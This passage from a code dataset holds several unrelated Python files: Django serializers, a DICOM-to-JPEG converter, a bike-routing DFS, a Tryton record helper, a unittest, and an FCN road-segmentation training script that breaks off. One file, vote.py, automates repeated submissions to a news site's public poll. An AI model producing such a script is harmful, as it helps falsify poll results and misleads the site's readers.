friend_request.accept()\n return validated_data\n\nclass RejectFriendRequestSerializer(serializers.ModelSerializer):\n request_id = IntegerField()\n class Meta:\n model = FriendshipRequest\n fields = ['request_id', ]\n\n def destroy(self, validated_data):\n request_id = validated_data['request_id']\n friend_request = FriendshipRequest.objects.get(pk=request_id)\n friend_request.reject()\n return validated_data","sub_path":"deploy/back-end/friendapi/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"292851175","text":"import binascii\nimport io\nimport os\nimport sys\nimport math\n\nimport PIL.Image\nimport pydicom\nimport numpy as np\n\nfrom shutil import copyfile\n\nerr = []\nwalk_dir = os.path.abspath(sys.argv[1])\nout_dirs = []\nfor i in range(2,len(sys.argv)):\n out_dirs.append(os.path.abspath(sys.argv[i]))\nprint('walk_dir (absolute) = ' + os.path.abspath(walk_dir))\nprint('out_dirs (absolute) = ' + str(out_dirs))\n\nfor root, subdirs, files in os.walk(walk_dir):\n print('--\\nroot = ' + root)\n\n for subdir in subdirs:\n print('\\t- subdirectory ' + subdir)\n\n for filename in files:\n file_path = os.path.join(root, filename)\n print('\\t- file %s (full path: %s)' % (filename, file_path))\n if filename.endswith('.dcm'):\n try:\n orig = pydicom.dcmread(file_path)\n pix_arr = orig.pixel_array\n img = PIL.Image.fromarray(pix_arr.astype('uint8'))\n if(img.mode == 'I;16'):\n img.mode = 'I'\n # print(img,orig)\n img = img.point(lambda i:i*(1./4)).convert('L')\n for out in out_dirs:\n fold = os.path.join(out,subdir)\n if not os.path.isdir(fold):\n os.mkdir(fold)\n pat = os.path.join(fold,filename)\n img.save(pat[:-4] + '.jpg')\n print('\\t- saved file ' + filename[:-4] + '.jpg' +\n ' (full path: ' + pat[:-4] + '.jpg' + ')')\n except NotImplementedError as e:\n print('\\t- ERROR: ' + str(e))\n err.append(str(e))\n pass\n elif filename.endswith('.jpg') or filename.endswith('jpeg'):\n for out in out_dirs:\n fold = os.path.join(out,subdir)\n if not os.path.isdir(fold):\n os.mkdir(fold)\n pat = os.path.join(fold,filename)\n copyfile(file_path,pat[:-4] + '.jpg')\n print('\\t- saved file ' + filename[:-4] + '.jpg' +\n ' (full path: ' + pat[:-4] + '.jpg' + ')')\n\nif len(err) > 0: print(err)\n","sub_path":"dcm-jpg.py","file_name":"dcm-jpg.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"262942643","text":"import bike\n\nC = 20 # 车的容量\nd = bike.d # d(i, j)表示i到j的距离\nB = bike.B # B(i, t)表示i点在t时刻的需求量\nT = 60 # 时间限制\nhave_buf = True\n\n\nclass Node(object):\n\n def __init__(self, parent, i):\n self.i = i\n self.parent = parent\n if parent:\n self.t = parent.t + parent.td + d(parent.i, i)\n else:\n self.t = 0\n\n if not parent:\n self.is_first = True\n else:\n self.is_first = False\n\n self.service()\n\n # 输出到当前节点的路径(递归)\n def print_node(self):\n if self.parent:\n self.parent.print_node()\n print(self.i, self.t, B(self.i, self.t),\n self.parent.buf[self.i], -self.x, self.C, sep='\\t')\n else:\n return\n\n def print_path(self):\n self.print_node()\n print('')\n\n # buf表示每个地方的库存\n def service(self):\n if self.is_first:\n self.sum = 0\n self.C = 0\n # buf表示每个站点的累计装卸,+表示获得,-表示失去\n self.buf = [0, 0, 0, 0, 0, 0]\n self.td = 0\n self.x = 0\n\n else:\n parent = self.parent\n i = self.i\n buf = parent.buf.copy()\n if have_buf:\n need = B(self.i, self.t) + buf[i]\n else:\n need = B(self.i, self.t)\n x = 0 # x表示装卸量, 恒为正\n\n # i车辆不足\n if need < 0:\n if abs(need) >= parent.C:\n x = parent.C\n buf[i] += x\n self.C = 0\n else:\n x = abs(need)\n buf[i] += x\n self.C = parent.C - x\n # i车辆过剩\n else:\n if need > C - parent.C:\n x = C - parent.C\n buf[i] -= x\n self.C = C\n else:\n x = need\n buf[i] -= x\n self.C = parent.C + x\n self.sum = parent.sum + x\n self.buf = buf\n self.td = 0.2 * x\n if need < 0:\n self.x = -x\n else:\n self.x = x\n\n\ndef DFS(opt=-1):\n s = [] # 这是一个栈\n max_Q = 0\n node = Node(parent=None, i=1)\n s.append(node)\n while s:\n node = s.pop()\n if node.t > T:\n continue\n else:\n max_Q = max(max_Q, node.sum)\n if opt != -1 and node.sum >= opt:\n node.print_path()\n for i in [2, 3, 4, 5]:\n # 下一个节点不要访问自己\n if i == node.i:\n continue\n new_node = Node(parent=node, i=i)\n # 如果新节点还有时间,那就给他个机会\n if new_node.t <= T:\n s.append(new_node)\n\n return max_Q\n\n\ndef analysis(path):\n node = Node(parent=None, i=1)\n for j in range(len(path)):\n if path[j] == 1:\n continue\n new_node = Node(parent=node, i=path[j])\n node = new_node\n\n print(node.sum)\n node.print_path()\n\n\nif __name__ == '__main__':\n flag = 2\n have_buf = True\n\n if flag == 1: # 找出指定T下的最优解\n max_Q = DFS()\n print(max_Q)\n DFS(max_Q)\n\n elif flag == 2: # 判断指定路径下的Q和b\n path1 = [1, 5, 2, 4, 3, 4, 2, 5]\n path2 = [1, 5, 2, 4, 3, 2, 4, 5]\n path3 = [1, 5, 2, 4, 2, 3, 4, 3, 2]\n path4 = [4, 2, 4 ,3, 4, 5 ,4] \n print('i\\tt\\tB\\tbuf\\tb\\tCi')\n analysis(path4)\n\n elif flag == 3: # 比较不同T下的最大Q值\n for var_t in range(40, 66):\n T = var_t\n max_Q = DFS()\n print('T=%s Q=%d' % (T, max_Q))\n","sub_path":"共享单车/old/dfs-冲突-徐亮_Win7.py","file_name":"dfs-冲突-徐亮_Win7.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"628674812","text":"#-*- coding: utf-8 -*-\nfrom proteus import Model\nimport utils\nimport calles\n\ndef crear_inmueble(party):\n \"\"\"\n Crea un sigcoop_inmueble.inmueble asociado a party.\n\n Módulos que modifican inmueble:\n sigcoop_inmueble/inmueble.py\n\n Campos:\n calle_dom = fields.Char('Calle', required=True)\n numero_dom = fields.Char('Numero', required=True)\n cp_dom = fields.Char('CP', required=True)\n localidad_dom = fields.Char('Localidad', required=True)\n partido_dom = fields.Char('Partido', required=True)\n titulares = fields.Many2Many('sigcoop_inmueble.inmueble_titular','inmueble_id', 'titular_id', 'Titulares del inmueble')\n \"\"\"\n Inmueble = Model.get('sigcoop_inmueble.inmueble')\n inmueble = Inmueble()\n inmueble.calle_dom = utils.random_from_list(calles.calles)\n inmueble.numero_dom = 'nro'\n inmueble.cp_dom = 'cp'\n inmueble.localidad_dom = 'localidad'\n inmueble.partido_dom = 'partido'\n inmueble.titulares.append(party)\n inmueble.save()\n return inmueble\n","sub_path":"scripts/inmueble.py","file_name":"inmueble.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"221024996","text":"from selenium import webdriver\nimport time\nimport random\n\ntarget_url = 'http://news.hankyung.com/poll/10504'\n#target_url = 'http://news.hankyung.com/poll/10504'\n\ndef vote():\n browser = webdriver.Chrome(r'C:\\chromedriver\\chromedriver.exe')\n browser.get(target_url)\n time.sleep(1)\n input = browser.find_element_by_id('qu01')\n input.click()\n time.sleep(1)\n button = browser.find_element_by_class_name('vote-btn')\n button.click()\n time.sleep(1)\n browser.quit()\n\nif __name__ == '__main__':\n for i in range(10):\n vote()\n time.sleep(random.randrange(1, 10))","sub_path":"crawler/vote.py","file_name":"vote.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"551269621","text":"#!/usr/bin/env python\n\"\"\" \"\"\"\n\n# Standard library modules.\nimport unittest\nimport logging\n\n# Third party modules.\n\n# Local modules.\nfrom pyhmsa_gui.util.human import camelcase_to_words\n\n# Globals and constants variables.\n\nclass TestModule(unittest.TestCase):\n\n def setUp(self):\n unittest.TestCase.setUp(self)\n\n def tearDown(self):\n unittest.TestCase.tearDown(self)\n\n def testcamelcase_to_words(self):\n text = 'JohnDoe'\n actual = camelcase_to_words(text)\n expected = ('John', 'Doe')\n self.assertEqual(expected, actual)\n\n text = 'JohnDoeAndJaneDoe'\n actual = camelcase_to_words(text)\n expected = ('John', 'Doe', 'And', 'Jane', 'Doe')\n self.assertEqual(expected, actual)\n\n text = 'John'\n actual = camelcase_to_words(text)\n expected = ('John',)\n self.assertEqual(expected, actual)\n\nif __name__ == '__main__': #pragma: no cover\n logging.getLogger().setLevel(logging.DEBUG)\n unittest.main()\n","sub_path":"pyhmsa_gui/util/test_human.py","file_name":"test_human.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"598843195","text":"import multiprocessing\nimport re\nimport os.path\nimport tensorflow as tf\nimport helper2_bev\nimport warnings\nfrom distutils.version import LooseVersion\nimport project_tests as tests\nfrom glob import glob\nimport numpy as np\nfrom skimage import io\nfrom skimage.transform import rescale, resize, downscale_local_mean\nimport cv2\nimport scipy.misc\nfrom PIL import Image\nimport random\n\n# Check TensorFlow Version\nassert LooseVersion(tf.__version__) >= LooseVersion('1.0'), 'Please use TensorFlow version 1.0 or newer. You are using {}'.format(tf.__version__)\nprint('TensorFlow Version: {}'.format(tf.__version__))\n\n# Check for a GPU\nif not tf.test.gpu_device_name():\n warnings.warn('No GPU found. Please use a GPU to train your neural network.')\nelse:\n print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))\n\n\ndef load_vgg(sess, vgg_path):\n \"\"\"\n Load Pretrained VGG Model into TensorFlow.\n :param sess: TensorFlow Session\n :param vgg_path: Path to vgg folder, containing \"variables/\" and \"saved_model.pb\"\n :return: Tuple of Tensors from VGG model (image_input, keep_prob, layer3_out, layer4_out, layer7_out)\n \"\"\"\n # TODO: Implement function\n # Use tf.saved_model.loader.load to load the model and weights\n vgg_tag = 'vgg16'\n vgg_input_tensor_name = 'image_input:0'\n vgg_keep_prob_tensor_name = 'keep_prob:0'\n vgg_layer3_out_tensor_name = 'layer3_out:0'\n vgg_layer4_out_tensor_name = 'layer4_out:0'\n vgg_layer7_out_tensor_name = 'layer7_out:0'\n\n tf.saved_model.loader.load(sess, [vgg_tag], vgg_path)\n image_input = tf.get_default_graph().get_tensor_by_name(vgg_input_tensor_name)\n keep_prob = tf.get_default_graph().get_tensor_by_name(vgg_keep_prob_tensor_name)\n layer3_out = tf.get_default_graph().get_tensor_by_name(vgg_layer3_out_tensor_name)\n layer4_out = tf.get_default_graph().get_tensor_by_name(vgg_layer4_out_tensor_name)\n layer7_out = tf.get_default_graph().get_tensor_by_name(vgg_layer7_out_tensor_name)\n \n return image_input, keep_prob, layer3_out, layer4_out, layer7_out\ntests.test_load_vgg(load_vgg, tf)\n\n\ndef layers(vgg_layer3_out, vgg_layer4_out, vgg_layer7_out, num_classes):\n \"\"\"\n Create the layers for a fully convolutional network. Build skip-layers using the vgg layers.\n :param vgg_layer7_out: TF Tensor for VGG Layer 3 output\n :param vgg_layer4_out: TF Tensor for VGG Layer 4 output\n :param vgg_layer3_out: TF Tensor for VGG Layer 7 output\n :param num_classes: Number of classes to classify\n :return: The Tensor for the last layer of output\n \"\"\"\n # TODO: Implement function\n # 1x1 convolution of vgg layer 7\n layer7a_out = tf.layers.conv2d(vgg_layer7_out, num_classes, 1, \n padding= 'same', \n kernel_initializer= tf.random_normal_initializer(stddev=0.01),\n kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n # upsample\n layer4a_in1 = tf.layers.conv2d_transpose(layer7a_out, num_classes, 4, \n strides= (2, 2), \n padding= 'same', \n kernel_initializer= tf.random_normal_initializer(stddev=0.01), \n kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n # make sure the shapes are the same!\n # 1x1 convolution of vgg layer 4\n layer4a_in2 = tf.layers.conv2d(vgg_layer4_out, num_classes, 1, \n padding= 'same', \n kernel_initializer= tf.random_normal_initializer(stddev=0.01), \n kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n # skip connection (element-wise addition)\n layer4a_out = tf.add(layer4a_in1, layer4a_in2)\n # upsample\n layer3a_in1 = tf.layers.conv2d_transpose(layer4a_out, num_classes, 4, \n strides= (2, 2), \n padding= 'same', \n kernel_initializer= tf.random_normal_initializer(stddev=0.01), \n kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n # 1x1 convolution of vgg layer 3\n layer3a_in2 = tf.layers.conv2d(vgg_layer3_out, num_classes, 1, \n padding= 'same', \n kernel_initializer= tf.random_normal_initializer(stddev=0.01), \n kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n # skip connection (element-wise addition)\n layer3a_out = tf.add(layer3a_in1, layer3a_in2)\n # upsample\n nn_last_layer = tf.layers.conv2d_transpose(layer3a_out, num_classes, 16, \n strides= (8, 8), \n padding= 'same', \n kernel_initializer= tf.random_normal_initializer(stddev=0.01), \n kernel_regularizer= tf.contrib.layers.l2_regularizer(1e-3))\n return nn_last_layer\n#tests.test_layers(layers)\n\n\ndef optimize(nn_last_layer, correct_label, learning_rate, num_classes):\n \"\"\"\n Build the TensorFLow loss and optimizer operations.\n :param nn_last_layer: TF Tensor of the last layer in the neural network\n :param correct_label: TF Placeholder for the correct label image\n :param learning_rate: TF Placeholder for the learning rate\n :param num_classes: Number of classes to classify\n :return: Tuple of (logits, train_op, cross_entropy_loss)\n \"\"\"\n # TODO: Implement function\n # make logits a 2D tensor where each row represents a pixel and each column a class\n logits = tf.reshape(nn_last_layer, (-1, num_classes))\n correct_label = tf.reshape(correct_label, (-1,num_classes))\n # define loss function\n\n #cross_entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits= logits, labels= correct_label))\n cross_entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits= logits, labels= correct_label))\n # define training operation\n optimizer = tf.train.AdamOptimizer(learning_rate= learning_rate)\n train_op = optimizer.minimize(cross_entropy_loss)\n\n return logits, train_op, cross_entropy_loss\ntests.test_optimize(optimize)\n\n\ndef train_nn(sess, epochs, train_op, cross_entropy_loss, input_image, correct_label, keep_prob, learning_rate, iterator,seed):\n \"\"\"\n Train neural network and print out the loss during training.\n :param sess: TF Session\n :param epochs: Number of epochs\n :param batch_size: Batch size\n :param get_batches_fn: Function to get batches of training data. Call using get_batches_fn(batch_size)\n :param train_op: TF Operation to train the neural network\n :param cross_entropy_loss: TF Tensor for the amount of loss\n :param input_image: TF Placeholder for input images\n :param correct_label: TF Placeholder for label images\n :param keep_prob: TF Placeholder for dropout keep probability\n :param learning_rate: TF Placeholder for learning rate\n \"\"\"\n # TODO: Implement function\n next_element = iterator.get_next()\n sess.run(tf.global_variables_initializer())\n \n print(\"Training...\")\n #print()\n for i in range(epochs):\n #sess.run(iterator.initializer)\n print(\"EPOCH {} ...\".format(i+1))\n #for image, label in get_batches_fn(batch_size):\n #for i in batch_size:\n # _, loss = sess.run([train_op, cross_entropy_loss], \n # feed_dict={input_image: image, correct_label: label, keep_prob: 0.5, learning_rate: 0.0009})\n # print(\"Loss: = {:.3f}\".format(loss))\n #images = []\n #gt_images = []\n # Compute for 100 epochs.\n\n #sess.run(iterator.initializer)\n sess.run(iterator.initializer, feed_dict={seed: i})\n\n while True:\n try:\n image,label = sess.run(next_element)\n\n #print(\"build batch\")\n\n #print('image',image)\n #print('shape',image[0].shape)\n #print('label',label[0].shape)\n #images.append(image)\n #gt_images.append(label[0])\n #print(len(image))\n #print(len(label))\n\n except tf.errors.OutOfRangeError:\n break\n #images_np = np.array(images)\n #gt_images_np = np.array(gt_images)\n #print('shape images',images_np.shape)\n #print('shape images',images_np.shape)\n #print('loss')\n _, loss = sess.run([train_op, cross_entropy_loss], feed_dict={input_image: image, correct_label: label, keep_prob: 0.5, learning_rate: 0.0009})\n ##########\n print(\"Loss: = {:.5f}\".format(loss))\n\n\n\n\n\n#tests.test_train_nn(train_nn)\n\n# background_color = np.array([255, 0, 0])\n\n# def _parse_function(filename, label):\n# print('file',filename)\n# print('label',label)\n# image_shape = (160, 576)\n \n# image_string = tf.read_file(filename)\n# image_decoded = tf.image.decode_png(image_string)\n# #image_resized = tf.image.resize_images(image_decoded, [4, 4])\n# image_resized = tf.image.resize_images(image_decoded, image_shape)\n\n# label_string = tf.read_file(label)\n# label_decoded = tf.image.decode_png(label_string)\n# label_resized = tf.image.resize_images(label_decoded, image_shape)\n\n# print('label', label_resized)\n# print('background_color',background_color)\n# gt_bg = np.all(label_resized == background_color, axis=2)\n# gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n# gt_image = np.concatenate((gt_bg, np.invert(gt_bg)), axis=2)\n# #images.append(image)\n# #gt_images.append(gt_image)\n# return image_resized, gt_image\n\n# def _read_resize_py_function(filename, label):\n# background_color = np.array([255, 0, 0])\n# image_shape = (160, 576)\n# # image_shape = (40, 128)\n# #image_decoded = cv2.imread(filename.decode(), cv2.IMREAD_GRAYSCALE)\n# #image_decoded = cv2.imread(filename.decode())\n# #print(filename.decode())\n# image_decoded = io.imread(filename.decode())\n# #print('hello')\n# #print(image_decoded.shape )\n# #print(image_decoded)\n# image_resized = resize(image_decoded, image_shape)\n\n# label_decoded = io.imread(label.decode())\n# label_resized = resize(label_decoded, image_shape)\n# #print (image_resized.shape)\n# #return image_decoded, label\n# gt_bg = np.all(label_resized == background_color, axis=2)\n# gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n# gt_image = np.concatenate((gt_bg, np.invert(gt_bg)), axis=2)\n# #print('gt_bg')\n# #print(gt_bg)\n# #print('gt_image')\n# #print(gt_image)\n# #print (image_resized.shape)\n# #print (gt_image.shape)\n# return image_resized, gt_image\n\n\n\n# def _read_resize_py_function(filename):\n\n# background_color = np.array([255, 0, 0])\n\n# image_shape = (160, 576)\n\n# folder_img = \"/home/shared/datasets/kitti_road/data_road/training/image_2\"\n# image_decoded = io.imread(folder_img+\"/\"+filename.decode())\n# print(folder_img+\"/\"+filename.decode())\n# image_resized = resize(image_decoded, image_shape)\n# #print(\"dataset\", folder_img+\"/\"+filename.decode())\n# filename_gt = re.sub(r'(?is)_', '_road_', filename.decode())\n# folder_gt = \"/home/shared/datasets/kitti_road/data_road/training/gt_image_2\" \n# label_decoded = io.imread(folder_gt+\"/\"+filename_gt)\n# print(folder_gt+\"/\"+filename_gt)\n# label_resized = resize(label_decoded, image_shape)\n# #print (image_resized.shape)\n# #return image_decoded, label\n# gt_bg = np.all(label_resized == background_color, axis=2)\n# gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n# gt_image = np.concatenate((gt_bg, np.invert(gt_bg)), axis=2)\n# #print('gt_bg')\n# #print(gt_bg)\n# #print('gt_image')\n# #print(gt_image)\n# #print (image_resized.shape)\n# #print (gt_image.shape)\n# #return image_resized, gt_image\n# return image_resized, gt_image\n\ndef blockshaped(arr, nrows, ncols):\n \"\"\"\n https://stackoverflow.com/questions/16873441/form-a-big-2d-array-from-multiple-smaller-2d-arrays/16873755#16873755\n Return an array of shape (n, nrows, ncols) where\n n * nrows * ncols = arr.size\n\n If arr is a 2D array, the returned array looks like n subblocks with\n each subblock preserving the \"physical\" layout of arr.\n \"\"\"\n h, w = arr.shape\n return (arr.reshape(h//nrows, nrows, -1, ncols)\n .swapaxes(1,2)\n .reshape(-1, nrows, ncols))\n\ndef unblockshaped(arr, h, w):\n \"\"\"\n https://stackoverflow.com/questions/16873441/form-a-big-2d-array-from-multiple-smaller-2d-arrays/16873755#16873755\n Return an array of shape (h, w) where\n h * w = arr.size\n\n If arr is of shape (n, nrows, ncols), n sublocks of shape (nrows, ncols),\n then the returned array preserves the \"physical\" layout of the sublocks.\n \"\"\"\n n, nrows, ncols = arr.shape\n return (arr.reshape(h//nrows, -1, nrows, ncols)\n .swapaxes(1,2)\n .reshape(h, w))\n\n\n\n\n\ndef depth_read(filename, left, right, top, bottom):\n # loads depth map D from png file\n # and returns it as a numpy array,\n # for details see readme.txt\n #depth_png = np.array(Image.open(filename), dtype=int)#####no rezize\n depth_png = Image.open(filename)\n cropped = depth_png.crop( ( left, top, right, bottom ) ) # size: 576 X 160\n #cropped.show()\n depth_png = np.array(cropped, dtype=int)\n # make sure we have a proper 16bit depth map here.. not 8bit!\n #depth_png.show()\n assert(np.max(depth_png) > 255)\n depth = depth_png.astype(np.float) / 256.\n depth = np.uint8(depth)\n #depth_png = depth_png.resize(new_size)\n #depth_png = np.array(depth_png, dtype=int)\n # make sure we have a proper 16bit depth map here.. not 8bit!\n #depth_png.show()\n #assert(np.max(depth_png) > 255)\n #depth = depth_png.astype(np.float) / 256.\n #depth[depth_png == 0] = -1.\n #depth = normalize(depth)\n #depth = np.uint8(depth)\n return depth\n\n\n\n\n\n\n\n\ndef _read_resize_py_function(filename):\n\n #background_color = np.array([0, 0, 255])\n background_color = np.array([0, 0, 0])\n r_color = np.array([255, 0, 0])#scipy.misc\n g_color = np.array([0, 255, 0])#scipy.misc\n b_color = np.array([0, 0, 255])#scipy.misc\n\n\n image_shape = (576,160)\n new_size =(576,160)\n width_d, height_d = 1242,375\n #width = width_d-576\n width = width_d-new_size[0]\n #height = height_d-160\n height = height_d-new_size[1]\n th_sky = 135 #threshold crop the sky\n left = random.randint(0, width) \n top = random.randint(th_sky, height)\n right, bottom = left+new_size[0], top+new_size[1]\n #image_arr = depth_read(filename, left, right, top, bottom)\n\n #folder_img = \"/home/shared/datasets/kitti_road/data_road/training/image_2\"\n\n #image_decoded = scipy.misc.imread(folder_img+\"/\"+filename.decode())\n #image_decoded = cv2.imread(folder_img+\"/\"+filename.decode())\n #image_decoded = Image.open(folder_img+\"/\"+filename.decode())\n #image_decoded = Image.open(folder_img+\"/\"+filename.decode())\n image_decoded = Image.open(filename.decode(),mode='r')\n\n #print(folder_img+\"/\"+filename.decode())\n #image_resized = scipy.misc.imresize(image_decoded, image_shape)\n #image_resized = cv2.resize(image_decoded, image_shape)\n #image_resized = Image.resize(image_decoded, image_shape)\n\n #image_decoded=image_decoded.resize(image_shape)\n cropped = image_decoded.resize( new_size ) # size: 576 X 160\n image_resized = np.array(cropped)\n #print(image_resized.shape)\n\n\n #print(\"dataset\", folder_img+\"/\"+filename.decode())\n\n #print(\"orig\",np.max(image_resized),np.min(image_resized))\n\n\n#print(image_resized)\n a = [-128,-128,-128]\n image_norm = np.sum((image_resized,a),axis=0)\n #print(\"resta\",np.max(image_norm),np.min(image_norm))\n\n image_norm = np.divide(image_norm,128)\n #cropped.save(\"nn.png\")\n #image_norm.astype(np.float32)\n\n #print (image_norm)\n #print(\"norm\",np.max(image_norm),np.min(image_norm))\n\n\n filename_gt = re.sub(r'(?is)data/', 'gt/', filename.decode())\n\n # filename_gt = re.sub(r'(?is)kitti_raw/raw_data', 'depth_kitti/depth/depth_single_img/train', filename_gt)\n # filename_gt = re.sub(r'(?is)2011_09_30/', '', filename_gt)\n # filename_gt = re.sub(r'(?is)2011_09_29/', '', filename_gt)\n # filename_gt = re.sub(r'(?is)2011_09_28/', '', filename_gt)\n # filename_gt = re.sub(r'(?is)2011_09_26/', '', filename_gt)\n # filename_gt = re.sub(r'(?is)2011_10_03/', '', filename_gt)\n # filename_gt = re.sub(r'(?is)data/', '', filename_gt)\n #print(\"filename\",filename_gt)\n #folder_gt = \"/home/shared/datasets/kitti_road/data_road/training/gt_image_2\" \n\n #label_decoded = scipy.misc.imread(folder_gt+\"/\"+filename_gt)\n #label_decoded = cv2.imread(folder_gt+\"/\"+filename_gt)\n #label_decoded = Image.open(folder_gt+\"/\"+filename_gt)\n #image_arr = depth_read(filename_gt,image_shape)\n # image_arr = depth_read(filename_gt, left, right, top, bottom)\n\n\n\n\n\n\n\n image_decodedgt = Image.open(filename_gt,mode='r')\n\n #print(folder_img+\"/\"+filename.decode())\n #image_resized = scipy.misc.imresize(image_decoded, image_shape)\n #image_resized = cv2.resize(image_decoded, image_shape)\n #image_resized = Image.resize(image_decoded, image_shape)\n\n #image_decoded=image_decoded.resize(image_shape)\n croppedgt = image_decodedgt.resize( new_size ) # size: 576 X 160\n\n\n\n label_resized= np.array(croppedgt)\n\n gt_bg = np.all(label_resized == background_color, axis=2)\n gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n\n gt_r = np.all(label_resized == r_color, axis=2)\n gt_r= gt_r.reshape(*gt_r.shape, 1)\n\n gt_g = np.all(label_resized == g_color, axis=2)\n gt_g = gt_g.reshape(*gt_g.shape, 1)\n\n gt_b = np.all(label_resized == b_color, axis=2)\n gt_b = gt_b.reshape(*gt_b.shape, 1)\n\n\n # gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n gt_image = np.concatenate((gt_bg, gt_r, gt_g, gt_b), axis=2)\n\n # print(\"shape image\",image_decoded.shape)\n # print(\"shape gt image\",gt_image.shape)\n\n ###############one hot########################\n # img_array = np.reshape(label_resized,(np.size(label_resized)))\n # one_hot = np.eye(4)[img_array]\n #print(one_hot.shape)\n #one_hot_b=blockshaped(one_hot, 1242, 85)\n #one_hot_b=blockshaped(one_hot, image_shape[0], 85)\n # 4 clases\n # one_hot =one_hot.reshape(160,576,4)\n #print(one_hot.shape)\n #one_hot_b=blockshaped(one_hot, image_shape[0], 85)\n #print(one_hot_b.dtype)\n # one_hot_b = one_hot.astype(bool)\n\n\n\n\n #print(label_resized.shape)\n #print(\"show\")\n #label_decoded.show()\n #print (label_resized)\n #gt_bg = np.all(label_resized == background_color, axis=2)\n #print(gt_bg.shape)\n #print(gt_bg[0][0])\n #gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n #print(gt_bg[0][0])\n #gt_image = np.concatenate((gt_bg, np.invert(gt_bg)), axis=2)\n\n\n\n #one_hot_b = one_hot_b.astype(bool)\n # gt_image = one_hot_b\n #print(gt_image[100][100])\n #print(gt_image.shape)\n #print(\"max\",np.max(label_resized))\n #print(\"min\",np.min(label_resized))\n #print(\"gt max\",np.max(gt_image))\n #print(\"gt min\",np.max(gt_image))\n #return folder_img+\"/\"+filename.decode(), folder_gt+\"/\"+filename_gt\n #print(\"shape image\",image_decoded.shape)\n #print(\"shape gt image\",gt_image.shape)\n\n\n\n\n\n\n\n\n\n\n\n#######################################################\n # print(\"gt shape\",gt_image.shape)\n # print(\"image_norm\",image_norm.shape)\n#######################################################\n\n\n #print(\"gt\",gt_image)\n #print(\"ax2\",np.size(gt_image,axis=2))\n #print(\"ax1\",np.size(gt_image,axis=1))\n #print(\"ax0\",np.size(gt_image,axis=0))\n #return cropped, gt_image\n return image_norm, gt_image\n #return image_decoded,image_decoded\n\n\n\n\n# def input_pipeline(filenames, batch_size, num_shards, seed=None):\n# #dataset = tf.data.Dataset.list_files(filenames).shuffle(num_shards)\n# #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename) .skip(1) .map(lambda row: parse_csv(row, hparams), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n# #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename).map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n# dataset = (tf.data.TextLineDataset(filenames).map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])), num_parallel_calls=multiprocessing.cpu_count()))#, cycle_length=5) \n# dataset = dataset.shuffle(buffer_size=10000, seed=seed)\n# #dataset = tf.data.TextLineDataset(filenames)\n# #dataset = dataset.map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])))\n# batched_dataset = dataset.batch(batch_size)\n# #dataset = tf.data.Dataset.from_tensor_slices((filenames, labels))\n# #dataset = dataset.map(lambda filename, label: tuple(tf.py_func( _read_resize_py_function, [filename, label], [tf.double, tf.bool])))\n# #dataset = dataset.shuffle(buffer_size=10000)\n# #batched_dataset = dataset.batch(batch_size)\n# #iterator = batched_dataset.make_one_shot_iterator()\n# #iterator = batched_dataset.make_initializable_iterator()\n# return batched_dataset.make_initializable_iterator()\n\ndef input_pipeline(filenames, batch_size, num_shards, seed=None):\n\n dataset = tf.data.Dataset.list_files(filenames).shuffle(num_shards)\n #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename) .skip(1) .map(lambda row: parse_csv(row, hparams), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename).map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])), num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename).map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.double, tf.bool])), \n num_parallel_calls=multiprocessing.cpu_count())), cycle_length=5) \n #dataset = dataset.interleave( lambda filename: (tf.data.TextLineDataset(filename).map(lambda filename: tuple(tf.py_func( _read_resize_py_function, [filename], [tf.string, tf.string])), num_parallel_calls=2)), cycle_length=2) \n dataset = dataset.shuffle(buffer_size=4000, seed=seed)\n batched_dataset = dataset.batch(batch_size)\n\n return batched_dataset.make_initializable_iterator()\n\n\n\n\n\n\ndef run():\n #num_classes = 3\n #num_classes = 85\n num_classes = 4\n image_shape = (576,160)\n data_dir = '/home/shared/datasets/bird_eye_view/kitti/'\n runs_dir = './runs_bev_kitti'\n #filenames = [\"/home/shared/datasets/kitti_road/data_road/training/training.txt\"]\n #filenames_gt = 